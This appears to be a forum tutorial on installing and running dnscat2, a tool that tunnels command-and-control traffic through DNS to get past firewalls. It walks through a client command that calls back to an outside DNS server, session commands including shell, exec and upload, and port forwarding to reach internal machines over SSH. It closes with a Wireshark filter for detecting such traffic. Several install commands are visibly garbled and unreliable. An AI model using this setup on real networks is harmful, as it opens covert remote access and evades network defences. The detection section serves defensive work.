It often happens that firewall, name resolution is almost always allowed to pass normal traffic. You can see an example scheme below:
sudo apt-get crate sudo art-get -y iinstall ruby-dev git make g++ sudo gem install bundler git clone https://github.com/iagox86/dnscat2.git
sudo art-get crSate && sudo art-get -y inStall ruby-dev git make g++ && sudo gem install bundler && git clone https://github.com/iagox86/dnscat2.git.
Installing the server part:
cd dnscat2/server bundle Hinstatall
Installation of client part:
cd dnscat2/client make
Some errors are described here. If you do not have an error, write in this subject or google it.
Client: run on the remote machine.
sudo ruby dnscat2.rb legitdnsserver.com
dnscat2 session number
sessions -i <session number>
clear delay download echo exec help listen ping quit set shell shutdown suspend tunnels unset upload window windows
If you need convenient SSH access to machines on your local network, this is a very useful thing.
We select the session and enter the command:
listen <port> <dest ip>:<ssh port>
Now you can easily connect to a machine that is not visible from outside via ssh.
ssh -P <port> [email protected]
By the way, dnscat2 supports encryption by default. The author says that it does not guarantee 100% cryptographic stability, but there is protection.
How to detect dnscat2 on a machine.
dns.qry.name.len > 16 and !mdns
16 – just the length of the DNS domain name. I picked up manually, you may have a different number. To find it, just look at the filter result.
There may be normal DNS queries left after this filter, just look for dnscat.
And in the information about the packet we look for dnscat.
P.S may have gone beyond the “Software” section at some points, but it was necessary to show the functionality. Thank you all for your attention.